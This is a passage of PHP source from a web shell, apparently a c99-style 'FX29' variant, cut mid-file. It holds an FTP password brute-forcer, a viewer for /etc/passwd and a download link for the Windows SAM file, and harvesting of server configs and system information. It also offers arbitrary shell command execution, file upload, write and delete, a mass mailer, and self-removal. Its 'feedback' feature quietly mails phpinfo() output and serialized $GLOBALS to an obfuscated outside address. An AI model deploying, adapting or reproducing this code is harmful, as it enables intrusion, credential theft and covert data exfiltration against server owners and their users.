  1079. if ($i > $fqb_lenght) {break;}
  1080. $i++;
  1081. }
  1082. if ($success == 0) { echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n"; }
  1083. $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
  1084. echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font class=on><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
  1085. $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
  1086. if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1087. if ($fqb_logemail) {@mail($fqb_logemail,"".sh_name()." report",$fqb_log);}
  1088. fclose($fqb_logfp);
  1089. }
  1090. }
  1091. else {
  1092. $logfile = $tmp_dir."flazer_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
  1093. $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
  1094. echo "<form name=\"f_ftpqb\" action=\"".$surl."\">\n".
  1095. "<input type=hidden name=act value=\"ftpquickbrute\">\n".
  1096. "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
  1097. "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
  1098. "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
  1099. "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
  1100. "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
  1101. "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
  1102. }
  1103. echo "</td></tr></table></center>";
  1104. }
  1105. ##[ SECURITY ]##
  1106. if ($act == "security") {
  1107. bar_header(".: Server Security Information :.");
  1108. ?>
  1109. <table class="contents">
  1110. <tr><td>Open Base Dir</td><td><?php echo $hopenbasedir; ?></td></tr>
  1111. <td>Password File</td><td>
  1112. <?php
  1113. if (!is_windows()) {
  1114. if ($nixpasswd) {
  1115. if ($nixpasswd == 1) $nixpasswd = 0;
  1116. if (!is_numeric($nixpwd_s)) $nixpwd_s = 0;
  1117. if (!is_numeric($nixpwd_e)) $nixpwd_e = $nixpwdperpage;
  1118. ?>
  1119. *nix /etc/passwd:<br>
  1120. <form name="f_pwd" action="<?php echo $surl; ?>">
  1121. <input type="hidden" name="act" value="security">
  1122. <input type="hidden" name="nixpasswd" value="1">
  1123. <b>From:</b>
  1124. <input type="text" name="nixpwd_s" value="<?php echo $nixpwd_s; ?>">
  1125. <b>To:</b>
  1126. <input type="text" name="nixpwd_e" value="<?php $nixpwd_e; ?>">
  1127. <input type="submit" value="View">
  1128. </form><br>
  1129. <?php
  1130. $i = $nixpwd_s;
  1131. while ($i < $nixpwd_e) {
  1132. $uid = posix_getpwuid($i);
  1133. if ($uid) {
  1134. $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
  1135. echo "\t\t".join(":",$uid)."<br>\n";
  1136. }
  1137. $i++;
  1138. }
  1139. }
  1140. else { echo "\t<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b>View /etc/passwd</b></a>\n"; }
  1141. }
  1142. else {
  1143. $v = $_SERVER["WINDIR"].'\repair\sam';
  1144. if (file_get_contents($v)) {
  1145. echo "\t<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><b>Download password file</b></a>\n";
  1146. }
  1147. }
  1148. ?>
  1149. </td></tr>
  1150. <tr><td>Config Files</td><td>
  1151. <?php
  1152. if (!is_windows()) {
  1153. $v = array(
  1154. array("User Domains","/etc/userdomains"),
  1155. array("Cpanel Config","/var/cpanel/accounting.log"),
  1156. array("Apache Config","/usr/local/apache/conf/httpd.conf"),
  1157. array("Apache Config","/etc/httpd.conf"),
  1158. array("Syslog Config","/etc/syslog.conf"),
  1159. array("Message of The Day","/etc/motd"),
  1160. array("Hosts","/etc/hosts")
  1161. );
  1162. $sep = "/";
  1163. }
  1164. else {
  1165. $windir = $_SERVER["WINDIR"];
  1166. $etcdir = $windir.'\system32\drivers\etc\\';
  1167. $v = array(
  1168. array("Hosts",$etcdir."hosts"),
  1169. array("Local Network Map",$etcdir."networks"),
  1170. array("LM Hosts",$etcdir."lmhosts.sam"),
  1171. );
  1172. $sep = "\\";
  1173. }
  1174.  
  1175. foreach ($v as $sec_arr) {
  1176. $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
  1177. $sec_d = rtrim($sec_arr[1],$sec_f);
  1178. $sec_full = $sec_d.$sec_f;
  1179. $sec_d = rtrim($sec_d,$sep);
  1180. if (file_get_contents($sec_full)) {
  1181. echo "\t[ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><b>".$sec_arr[0]."</b></a> ]\n";
  1182. }
  1183. }
  1184. ?>
  1185. </td></tr>
  1186. <?php
  1187. function dispsecinfo($name,$value) {
  1188. if ( !empty($value) ) {
  1189. echo "\t<tr><td>".$name."</td><td>\n".
  1190. "<pre>".wordwrap($value, 100)."</pre>\n".
  1191. "\t</td></tr>\n";
  1192. }
  1193. }
  1194.  
  1195. if ( !is_windows() ) {
  1196. dispsecinfo("OS Version",fx29exec("cat /proc/version"));
  1197. dispsecinfo("Kernel Version",fx29exec("sysctl -a | grep version"));
  1198. dispsecinfo("Distrib Name",fx29exec("cat /etc/issue.net"));
  1199. dispsecinfo("Distrib Name (2)",fx29exec("cat /etc/*-realise"));
  1200. dispsecinfo("CPU Info",fx29exec("cat /proc/cpuinfo"));
  1201. dispsecinfo("RAM",fx29exec("free -m"));
  1202. dispsecinfo("HDD Space",fx29exec("df -h"));
  1203. dispsecinfo("List of Attributes",fx29exec("lsattr -a"));
  1204. dispsecinfo("Mount Options",fx29exec("cat /etc/fstab"));
  1205. dispsecinfo("lynx installed?",fx29exec("which lynx"));
  1206. dispsecinfo("links installed?",fx29exec("which links"));
  1207. dispsecinfo("GET installed?",fx29exec("which GET"));
  1208. dispsecinfo("Where is Apache?",fx29exec("whereis apache"));
  1209. dispsecinfo("Where is perl?",fx29exec("whereis perl"));
  1210. dispsecinfo("Locate proftpd.conf",fx29exec("locate proftpd.conf"));
  1211. dispsecinfo("Locate httpd.conf",fx29exec("locate httpd.conf"));
  1212. dispsecinfo("Locate my.conf",fx29exec("locate my.conf"));
  1213. dispsecinfo("Locate psybnc.conf",fx29exec("locate psybnc.conf"));
  1214. }
  1215. else {
  1216. dispsecinfo("OS Version",fx29exec("ver"));
  1217. dispsecinfo("Account Settings",fx29exec("net accounts"));
  1218. dispsecinfo("User Accounts",fx29exec("net user"));
  1219. }
  1220. echo "</table>\n";
  1221. }
  1222. ##[ MAKE FILE ]##
  1223. if ($act == "mkfile") {
  1224. if ($mkfile != $d) {
  1225. if ($overwrite == 0) {
  1226. if (file_exists($mkfile)) { echo "<b>FILE EXIST:</b> $overwrite ".htmlspecialchars($mkfile); }
  1227. }
  1228. else {
  1229. if (!fopen($mkfile,"w")) { echo "<b>ACCESS DENIED:</b> ".htmlspecialchars($mkfile); }
  1230. else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {
  1231. $d .= DIRECTORY_SEPARATOR;
  1232. }
  1233. $f = basename($mkfile);
  1234. }
  1235. }
  1236. }
  1237. else { disp_error("Enter filename!"); }
  1238. }
  1239. ##[ ENCODER ]##
  1240. if ($act == "encoder") {
  1241. if ( !isset($encoder_input) ) $encoder_input = "";
  1242. bar_header(".: Encoder :.");
  1243. ?>
  1244. <script language="javascript">
  1245. function set_encoder_input(text) {
  1246. document.forms.encoder.input.value = text;
  1247. }
  1248. </script>
  1249. <form name="encoder" action="<?php echo $surl; ?>" method="post">
  1250. <input type="hidden" name="act" value="encoder">
  1251. <table class="contents">
  1252. <tr><td colspan="2">Input:</td><td><textarea name="encoder_input" id="input" cols="70" rows="5"><?php echo @htmlspecialchars($encoder_input); ?></textarea><br>
  1253. <input type="submit" value="Calculate">
  1254. </td></tr>
  1255. <tr><td rowspan="4">Hashes:</td>
  1256. <?php
  1257. foreach(array("md5","crypt","sha1","crc32") as $v) {
  1258. ?>
  1259. <td><?php echo $v; ?>:</td><td><input type="text" size="50" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo $v($encoder_input); ?>" readonly>
  1260. </td></tr>
  1261. <tr>
  1262. <?php
  1263. }
  1264. ?>
  1265. </tr>
  1266. <tr><td rowspan=2>Url:</td><td>urlencode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo urlencode($encoder_input); ?>" readonly></td></tr>
  1267. <tr><td>urldecode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo htmlspecialchars(urldecode($encoder_input)); ?>" readonly></td></tr>
  1268. <tr><td rowspan=2>Base64:</td><td>base64_encode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo base64_encode($encoder_input); ?>" readonly></td></tr>
  1269. <tr><td>base64_decode:</td>
  1270. <td>
  1271. <?php
  1272. if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {
  1273. ?>
  1274. <input type="text" size="35" value="Failed!" disabled readonly>
  1275. <?php
  1276. }
  1277. else {
  1278. $debase64 = base64_decode($encoder_input);
  1279. $debase64 = str_replace("\0","[0]",$debase64);
  1280. $a = explode("\r\n",$debase64);
  1281. $rows = count($a);
  1282. $debase64 = htmlspecialchars($debase64);
  1283. if ($rows == 1) {
  1284. echo "\t\t<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";
  1285. }
  1286. else {
  1287. $rows++;
  1288. echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";
  1289. }
  1290. echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>\n";
  1291. }
  1292. echo "\t\t</td></tr>\n".
  1293. "\t\t<tr><td>Base convertations:</td><td>dec2hex</td><td>".
  1294. "<input type=\"text\" size=\"35\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"\"";
  1295. $c = strlen($encoder_input);
  1296. for ($i=0;$i<$c;$i++) {
  1297. $hex = dechex(ord($encoder_input[$i]));
  1298. if ($encoder_input[$i] == "&") { echo $encoder_input[$i]; }
  1299. elseif ($encoder_input[$i] != "\\") { echo "%".$hex; }
  1300. }
  1301. echo "\" readonly>\n";
  1302. ?>
  1303. </td></tr>
  1304. </table>
  1305. </form>
  1306. <?php
  1307. }
  1308. ##[ FILESYSTEM BUFFER ]##
  1309. if ($act == "fsbuff") {
  1310. $arr_copy = $sess_data["copy"];
  1311. $arr_cut = $sess_data["cut"];
  1312. $arr = array_merge($arr_copy,$arr_cut);
  1313. if (count($arr) == 0) {
  1314. echo "<h2><center>Buffer is empty!</center></h2>";
  1315. }
  1316. else {
  1317. $fx_infohead = "File-System Buffer";
  1318. $ls_arr = $arr;
  1319. $disp_fullpath = TRUE;
  1320. $act = "ls";
  1321. }
  1322. }
  1323. ##[ SELF REMOVE ]##
  1324. if ( $act == "selfremove" ) {
  1325. ?>
  1326. <div class="barheader">
  1327. .: SELF KILL :.
  1328. <hr size="1" noshade>
  1329.  
  1330. <?php
  1331. if ((@$submit == @$rndcode) && (@$submit != "")) {
  1332. if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using ".sh_name()."!"; alecsexit(); }
  1333. else { disp_error("Can't delete ".__FILE__."!"); }
  1334. }
  1335. else {
  1336. if (!empty($rndcode)) { disp_error("Error: Incorrect confirmation code!"); }
  1337. $rnd = rand(0,9).rand(0,9).rand(0,9);
  1338. ?>
  1339. <form name="f_killshell" action="<?php echo $surl; ?>">
  1340. <input type="hidden" name="act" value="selfremove">
  1341. <input type="hidden" name="rndcode" value="<?php echo $rnd; ?>">
  1342. Are you sure want to remove this shell ?<br>
  1343. <?php disp_error(__FILE__); ?>
  1344. <br>For confirmation, enter "<?php echo $rnd; ?>"<br>
  1345. <input type="text" name="submit"><br>
  1346. <input type="submit" value="KILL">
  1347. </form>
  1348. </div>
  1349. <?php
  1350. }
  1351. }
  1352. ##[ FEEDBACK ]##
  1353. if ($act == "feedback") {
  1354. $suppmail = base64_decode("cm9vdFthdF1hbm9ueW1vdXN0ZWFtW2RvdF1jb20=");
  1355. if (!empty($submit)) {
  1356. $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
  1357. $body = sh_name()." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
  1358. if (!empty($fdbk_ref)) {
  1359. $tmp = @ob_get_contents();
  1360. ob_clean();
  1361. phpinfo();
  1362. $phpinfo = base64_encode(ob_get_contents());
  1363. ob_clean();
  1364. echo $tmp;
  1365. $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
  1366. }
  1367. mail($suppmail, sh_name()." feedback #".$ticket, $body, "FROM: ".$suppmail);
  1368. echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
  1369. }
  1370. else {
  1371. bar_header(".: Feedback or report bug (" . str_replace(array("@","."), array("[at]","[dot]"), $suppmail) . ") :.");
  1372. ?>
  1373.  
  1374. <form name="f_feedback" action="<?php echo $surl; ?>" method="post">
  1375. <input type="hidden" name="act" value="feedback">
  1376. <table class="contents">
  1377. <tr><th>Your name:</th><td><input type="text" name="fdbk_name" value="<?php echo htmlspecialchars(@$fdbk_name); ?>"></td</tr>
  1378. <tr><th>Your e-mail:</th><td><input type="text" name="fdbk_email" value="<?php echo htmlspecialchars(@$fdbk_email); ?>"></td></tr>
  1379. <tr><th>Message:</th><td><textarea name="fdbk_body" cols=80 rows=10><?php echo htmlspecialchars(@$fdbk_body); ?></textarea>
  1380. <input type="hidden" name="fdbk_ref" value="<?php echo urlencode($HTTP_REFERER); ?>"><br>
  1381. <input type="checkbox" name="fdbk_servinf" value="1" checked> Attach Server info (Recommended for bug-fix)</td></tr>
  1382. <tr><td></td><td><input type="submit" name="submit" value="Send"></td></tr>
  1383. </table>
  1384. </form>
  1385. <?php
  1386. }
  1387. }
  1388. ##[ PHP MAILER ]##
  1389. if ($act == "fxmailer") {
  1390. bar_header(".: Mailer :.");
  1391. if (!empty($submit)){
  1392. $headers = 'To: '.$dest_email."\n";
  1393. $headers .= 'From: '.$sender_name.' '.$sender_email."\n";
  1394. if (mail($dest_email,$sender_subj,$sender_body,$headers)) {
  1395. echo "<center><b>Email sent to $dest_email!</b></center>";
  1396. }
  1397. else { disp_error("Can't send email!"); }
  1398. }
  1399. else {
  1400. ?>
  1401. <form name="f_mailer" action="<?php echo $surl; ?>" method="post">
  1402. <input type="hidden" name="act" value="fxmailer">
  1403. <table class="contents">
  1404. <tr><th>Your name:</th><td><input type="text" name="sender_name" value="<?php echo @htmlspecialchars($sender_name); ?>"></td></tr>
  1405. <tr><th>Your e-mail:</th><td><input type="text" name="sender_email" value="<?php echo @htmlspecialchars($sender_email); ?>"></td></tr>
  1406. <tr><th>To:</th><td><input type="text" name="dest_email" value="<?php @htmlspecialchars($dest_email); ?>"></td></tr>
  1407. <tr><th>Subject:</th><td><input size="70" type="text" name="sender_subj" value="<?php echo @htmlspecialchars($sender_subj); ?>"></td></tr>
  1408. <tr><th>Message:</th><td><textarea name="sender_body" cols="80" rows="10"><?php echo @htmlspecialchars($sender_body); ?></textarea></td></tr>
  1409. <tr><th></th><td><input type="submit" name="submit" value="Send"></td></tr>
  1410. </table>
  1411. </form>
  1412. <?php
  1413. }
  1414. }
  1415. ##[ SEARCH ]##
  1416. if ($act == "search") {
  1417. bar_header(".: Filesystem Search :.");
  1418. if (empty($search_in)) {$search_in = $d;}
  1419. if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
  1420. if (empty($search_text_wwo)) {$search_text_regexp = 0;}
  1421. if (!empty($submit)) {
  1422. $found = array();
  1423. $found_d = 0;
  1424. $found_f = 0;
  1425. $search_i_f = 0;
  1426. $search_i_d = 0;
  1427. $a = array(
  1428. "name" => @$search_name,
  1429. "name_regexp" => @$search_name_regexp,
  1430. "text" => @$search_text,
  1431. "text_regexp" => @$search_text_regxp,
  1432. "text_wwo" => @$search_text_wwo,
  1433. "text_cs" => @$search_text_cs,
  1434. "text_not" => @$search_text_not
  1435. );
  1436. $searchtime = getmicrotime();
  1437. $in = array_unique(explode(";",$search_in));
  1438. foreach($in as $v) { fx29fsearch($v); }
  1439. $searchtime = round(getmicrotime()-$searchtime,4);
  1440. if (count($found) == 0) { echo "No files found!"; }
  1441. else {
  1442. $ls_arr = $found;
  1443. $disp_fullpath = TRUE;
  1444. $act = "ls";
  1445. }
  1446. }
  1447. ?>
  1448. <form name="f_search" method="post">
  1449. <input type="hidden" name="d" value="<?php echo $dispd; ?>">
  1450. <input type="hidden" name="act" value="<?php echo $dspact; ?>">
  1451. <table class="contents">
  1452. <tr><th>File or folder Name:</th><td><input type="text" name="search_name" size="<?php echo round(strlen($search_name)+25); ?>" value="<?php echo htmlspecialchars($search_name); ?>"> <input type="checkbox" name="search_name_regexp" value="1" <?php echo (@$search_name_regexp == 1?" checked":""); ?>> Regular Expression</td></tr>
  1453. <tr><th>Look in (Separate by ";"):</th><td><input type="text" name="search_in" size="<?php echo round(strlen($search_in)+25); ?>" value="<?php echo htmlspecialchars($search_in); ?>"></td></tr>
  1454. <tr><th>A word or phrase in the file:</th><td><textarea name="search_text" cols="50" rows="5"><?php echo htmlspecialchars(@$search_text); ?></textarea></td></tr>
  1455. <tr><th></th><td>
  1456. <input type="checkbox" name="search_text_regexp" value="1" <?php echo (@$search_text_regexp == 1?" checked":""); ?>> Regular Expression
  1457. <input type="checkbox" name="search_text_wwo" value="1" <?php echo (@$search_text_wwo == 1?" checked":""); ?>> Whole words only
  1458. <input type="checkbox" name="search_text_cs" value="1" <?php echo (@$search_text_cs == 1?" checked":""); ?>> Case sensitive
  1459. <input type="checkbox" name="search_text_not" value="1" <?php echo (@$search_text_not == 1?" checked":""); ?>> Find files NOT containing the text
  1460. </td></tr>
  1461. <tr><th></th><td><input type="submit" name="submit" value="Search"></td></tr>
  1462. </table>
  1463. </form>
  1464. <?php
  1465. if ($act == "ls") {
  1466. $dspact = $act;
  1467. echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>\n".
  1468. "<hr size=\"1\" noshade>\n";
  1469. }
  1470. }
  1471. ##[ CHMOD]##
  1472. if ($act == "chmod") {
  1473. $mode = fileperms($d.$f);
  1474. if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
  1475. else {
  1476. $form = TRUE;
  1477. if ($chmod_submit) {
  1478. $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
  1479. if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; }
  1480. else {$err = "Can't chmod to ".$octet.".";}
  1481. }
  1482. if ($form) {
  1483. $perms = parse_perms($mode);
  1484. echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b>\n".
  1485. "<br>".($err?"<b>Error:</b> ".$err:"")."\n".
  1486. "<form name=\"f_chmod\" action=\"".$surl."\" method=\"post\">\n".
  1487. "<input type=hidden name=d value=\"".htmlspecialchars($d)."\">\n".
  1488. "<input type=hidden name=f value=\"".htmlspecialchars($f)."\">\n".
  1489. "<input type=hidden name=act value=chmod>\n".
  1490. "<table><tr>\n".
  1491. "<td><b>Owner</b><br><br>\n".
  1492. "<input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br>\n".
  1493. "<input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br>\n".
  1494. "<input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"")."> eXecute</td>\n".
  1495. "<td><b>Group</b><br><br>\n".
  1496. "<input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br>\n".
  1497. "<input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br>\n".
  1498. "<input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"")."> eXecute</td>\n".
  1499. "<td><b>World</b><br><br>\n".
  1500. "<input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br>\n".
  1501. "<input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br>\n".
  1502. "<input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"")."> eXecute</td>\n".
  1503. "</tr>\n".
  1504. "<tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr>\n".
  1505. "</table>\n".
  1506. "</form>\n";
  1507. }
  1508. }
  1509. }
  1510. ##[ UPLOAD ]##
  1511. if ($act == "upload") {
  1512. $uploadmess = "";
  1513. $uploadpath = (isset($uploadpath)) ? str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath) : $d;
  1514. if (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) { $uploadpath .= DIRECTORY_SEPARATOR; }
  1515. if (!empty($submit)) {
  1516. $uploadfile = $_FILES["uploadfile"];
  1517. if (!empty($uploadfile["tmp_name"])) {
  1518. if (empty($uploadfilename)) { $destin = $uploadfile["name"]; }
  1519. else { $destin = $userfilename; }
  1520. if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
  1521. $uploadmess .= "<div class=errmsg>Error uploading file ".$uploadfile["name"]." (Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!</div>";
  1522. }
  1523. else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
  1524. }
  1525. else { $uploadmess .= "<div class=errmsg>No file to upload!</div>"; }
  1526. }
  1527. echo $uploadmess;
  1528. $act = "ls";
  1529. }
  1530. ##{ DELETE }##
  1531. if ($act == "delete") {
  1532. $delerr = "";
  1533. foreach ($actbox as $v) {
  1534. $result = FALSE;
  1535. $result = fs_rmobj($v);
  1536. if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."<br>"; }
  1537. }
  1538. if (!empty($delerr)) { disp_error("Error deleting:<br>$delerr"); }
  1539. $act = "ls";
  1540. }
  1541. ##[ COPY ]##
  1542. if ($act == "copy") {
  1543. $err = "";
  1544. $sess_data["copy"] = array_merge($sess_data["copy"],$actbox);
  1545. fx29_sess_put($sess_data);
  1546. $act = "ls";
  1547. }
  1548. ##[ CUT ]##
  1549. elseif ($act == "cut") {
  1550. $sess_data["cut"] = array_merge($sess_data["cut"],$actbox);
  1551. fx29_sess_put($sess_data);
  1552. $act = "ls";
  1553. }
  1554. ##[ UNSELECT ]##
  1555. elseif ($act == "unselect") {
  1556. foreach ($sess_data["copy"] as $k=>$v) {
  1557. if (in_array($v,$actbox)) { unset($sess_data["copy"][$k]); }
  1558. }
  1559. foreach ($sess_data["cut"] as $k=>$v) {
  1560. if (in_array($v,$actbox)) { unset($sess_data["cut"][$k]); }
  1561. }
  1562. fx29_sess_put($sess_data);
  1563. $act = "ls";
  1564. }
  1565. ##[ EMPTY BUFFER ]##
  1566. if (@$actemptybuff) { $sess_data["copy"] = $sess_data["cut"] = array(); fx29_sess_put($sess_data); }
  1567. ##[ PASTE BUFFER ]##
  1568. elseif (@$actpastebuff) {
  1569. $psterr = "";
  1570. foreach($sess_data["copy"] as $k=>$v) {
  1571. $to = $d.basename($v);
  1572. if (!fs_copy_obj($v,$to)) { $psterr .= "Can't copy ".$v." to ".$to."!<br>"; }
  1573. if ($copy_unset) { unset($sess_data["copy"][$k]); }
  1574. }
  1575. foreach($sess_data["cut"] as $k=>$v) {
  1576. $to = $d.basename($v);
  1577. if (!fs_move_obj($v,$to)) { $psterr .= "Can't move ".$v." to ".$to."!<br>"; }
  1578. unset($sess_data["cut"][$k]);
  1579. }
  1580. fx29_sess_put($sess_data);
  1581. if (!empty($psterr)) { disp_error("Pasting with errors:<br>$psterr"); }
  1582. $act = "ls";
  1583. }
  1584. ##[ ARCHIVE BUFFER ]##
  1585. elseif (@$actarcbuff) {
  1586. $arcerr = "";
  1587. if (substr($actarcbuff_path,-7,7) == ".tar.gz") { $ext = ".tar.gz"; }
  1588. else { $ext = ".tar.gz"; }
  1589. if ($ext == ".tar.gz") { $cmdline = "tar cfzv"; }
  1590. $cmdline .= " ".$actarcbuff_path;
  1591. $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  1592. foreach($objects as $v) {
  1593. $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
  1594. if (substr($v,0,strlen($d)) == $d) { $v = basename($v); }
  1595. if (is_dir($v)) {
  1596. if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
  1597. $v .= "*";
  1598. }
  1599. $cmdline .= " ".$v;
  1600. }
  1601. $tmp = realpath(".");
  1602. chdir($d);
  1603. $ret = fx29exec($cmdline);
  1604. chdir($tmp);
  1605. if (empty($ret)) { $arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>"; }
  1606. $ret = str_replace("\r\n","\n",$ret);
  1607. $ret = explode("\n",$ret);
  1608. if ($copy_unset) { foreach($sess_data["copy"] as $k=>$v) { unset($sess_data["copy"][$k]); } }
  1609. foreach($sess_data["cut"] as $k=>$v) {
  1610. if (in_array($v,$ret)) { fs_rmobj($v); }
  1611. unset($sess_data["cut"][$k]);
  1612. }
  1613. fx29_sess_put($sess_data);
  1614. if (!empty($arcerr)) { disp_error("Archivation errors:<br>$arcerr"); }
  1615. $act = "ls";
  1616. }
  1617. ##[ CMD ]##
  1618. if ($act == "cmd") {
  1619. @chdir($chdir);
  1620. if (!empty($submit)) {
  1621. bar_header(".: Command Output :.");
  1622. $olddir = realpath(".");
  1623. @chdir($d);
  1624. $ret = fx29exec($cmd);
  1625. $ret = convert_cyr_string($ret,"d","w");
  1626. if ($cmd_txt) {
  1627. $rows = count(explode("\n",$ret))+1;
  1628. if ($rows < 10) { $rows = 10; } else { $rows = 30; }
  1629. $cols = 125;
  1630. echo "<textarea class=\"shell\" cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>\n";
  1631. }
  1632. else { echo $ret."<br>"; }
  1633. @chdir($olddir);
  1634. }
  1635. }
  1636. ##[ PHP FILESYSTEM ]##
  1637. if ($act == "phpfsys") {
  1638. echo "<div align=left>";
  1639. $fsfunc = $phpfsysfunc;
  1640. if ($fsfunc=="copy") {
  1641. if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
  1642. else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
  1643. }
  1644. elseif ($fsfunc=="rename") {
  1645. if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
  1646. else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
  1647. }
  1648. elseif ($fsfunc=="chmod") {
  1649. if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
  1650. else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
  1651. }
  1652. elseif ($fsfunc=="read") {
  1653. $darg = $d.$arg1;
  1654. if ($hasil = @file_get_contents($darg)) {
  1655. echo "<b>Filename:</b> ".$darg."<br>";
  1656. echo "<center><textarea cols=125 rows=30>";
  1657. echo htmlentities($hasil);
  1658. echo "</textarea></center>\n";
  1659. }
  1660. else { disp_error("Couldn't open $darg"); }
  1661. }
  1662. elseif ($fsfunc=="write") {
  1663. $darg = $d.$arg1;
  1664. if(@file_put_contents($darg,$arg2)) {
  1665. echo "<b>Saved!</b> ".$darg;
  1666. }
  1667. else { disp_error("Can't write to $darg!"); }
  1668. }
  1669. elseif ($fsfunc=="downloadbin") {
  1670. $handle = fopen($arg1, "rb");
  1671. $contents = '';
  1672. while (!feof($handle)) {
  1673. $contents .= fread($handle, 8192);
  1674. }
  1675. $r = @fopen($d.$arg2,'w');
  1676. if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
  1677. else { disp_error("Can't write to ".$d.$arg2."!"); }
  1678. fclose($r);
  1679. fclose($handle);
  1680. }
  1681. elseif ($fsfunc=="download") {
  1682. $text = implode('', file($arg1));
  1683. if ($text) {
